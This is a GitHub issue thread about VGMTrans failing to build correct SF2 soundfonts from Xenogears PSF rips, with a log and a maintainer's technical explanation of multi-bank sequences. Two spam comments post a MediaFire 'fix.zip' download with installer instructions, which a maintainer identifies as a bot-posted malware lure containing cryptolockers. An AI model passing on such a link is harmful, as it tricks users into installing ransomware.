### ISSUE TITLE
VGMTrans with Xenogears PSFs don't put together SF2s properly

### ISSUE THREAD

**Issue by DaforLynx** [vgmtrans/vgmtrans#545]
### Environment details

* Operating System+version: Win10
* VGMTrans version: 1.2
* Game ROM/music dump name and sha256: Xenogears

### Describe the bug

Trying to rip MIDI+SF2 from [PSF files found on Zophar](https://www.zophar.net/music/playstation-psf/xenogears). Many of the tracks play with the wrong instruments. This is a result of the soundfont not being put together properly. A prominent example is battle3 ("Knight of Fire"), where nearly all of the samples seem to come from the wrong sample group.

Additionally, trying to put the collection together manually results in VGMTrans failing to put together an SF2 entirely, despite all needed files being present. Worth noting is that whatever it figures out by dragging and dropping by itself works perfectly fine besides the above issues - however, the sample group used is not visible in the collection window in the bottom left.

### Steps to reproduce

1. Drag and drop any or all of the PSF files from the above link.
2. Play some of the tracks. Note issues. Observe the collection window in the bottom left.
3. Clear workspace and drag and drop a single PSF.
4. Create a collection manually, and select any combination of sequence, bank, and samples.

### Expected behaviour

The expected behavior is that the program would choose the correct bank and samples to go with each track. I hypothesize that it needs to combine all the instruments and samples in each PSF together somehow (for example, battle3 has one bank and two sample collections. one sample collection clearly has an iconic voice sample present in the song, but the rest of the instruments are stored in the other sample collection). At the very least the user should be able to manually stitch together a collection (this is what I did with Breath of Fire III and it worked more or less perfectly).

### Additional context

I'm aware that PSFs are a varied and difficult to crack format. I just figured this particular issue doesn't seem that far from being fixed. Alternatively, it's possible I need to find a different batch of PSFs.

### Logs

<details><summary>Click to expand log</summary>

```
Running (7cf66dd, master), BASS 2041100, Qt 6.6.1
Loaded battle3
Loaded wds 251 successfully.
Loaded wds 38 successfully.
Loaded wds 42 successfully.
Loaded VGMSampColl successfully.
Loaded VGMSampColl successfully.
Loaded VGMSampColl successfully.
SampColl does not exist
SF2 conversion for 'User-defined collection' aborted
Failed to play collection as a soundfont file could not be produced.
```

</details>

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by sykhro** [comment]
I have delete messages from this ticket which contained malware

**Comment by Bonboon229** [comment]
Yikes, malware!?

**Comment by sykhro** [comment]
Yes, there are some bots posting links to random ZIPs tricking people into "a possible fix". Those ZIPs contain cryptolockers and all sorts of nasty stuff

**Comment by mikelow** [comment]
Addressing the issue, the problem seems to be that this driver supports multiple instrument sets per sequence. Bank selection is done via the 0xFE event and matches the id in the instrset header. It also appears that event 0xFC changes both bank and program number. The sequence file header only specifies the default bank number, so we can only determine which banks are used after loading the entire sequence and tracking bank change events.

We probably need to think of a better way to process collections for formats like this. It would preferable to not break manual collection creation. AkaoPS1 has a similar problem, except that in that case, the instrument set must be fully processed to help determine additional sample collections.

At any rate, I'm not planning to work on this at the moment.
